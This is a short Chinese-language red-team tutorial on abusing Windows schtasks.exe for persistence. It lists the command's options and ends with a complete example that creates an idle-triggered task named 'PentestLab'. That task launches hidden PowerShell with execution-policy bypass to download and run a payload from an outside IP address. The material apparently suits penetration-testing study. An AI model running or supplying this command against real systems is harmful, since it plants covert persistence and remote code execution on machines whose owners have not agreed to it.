1.概述
Windows操作系统提供了一个实用程序 (schtasks.exe) ,使系统管理员能够在特定的日期和时间执行程序或脚本。这种行为可作为一种持久性机制被red team利用。通过计划任务执行持久性不需要管理员权限,但如果已获得提升的权限,则允许进一步操作,例如在用户登录期间或在空闲状态期间执行任务
2.方法
常用语法:
/tn 计划任务名
/tr 这个计划任务所要运行程序的路径和文件名
/sc 指定计划频率
/i 运行这个计划之前要等待的时间(min)/ru 使用指定用户帐户的权限运行任务
/ed 指定此任务运行的最后一天的日期,格式是 yyyy/mm/dd/et 指定运行任务的结束时间,时间格式为 HH:mm(24 小时时间)
/z 在最终运行完任务后删除任务
/it 仅有在 /ru 用户当前已登录,且作业正在运行时才可以交互式运行任务
例如:在目标机器上创建计划任务PentestLab
# 每次用户会话空闲三分钟执行一次,下载并执行基于PowerShell的有效负载
schtasks /create /tn PentestLab /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -w hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.107.129:80/a'''))'" /sc onidle /i 3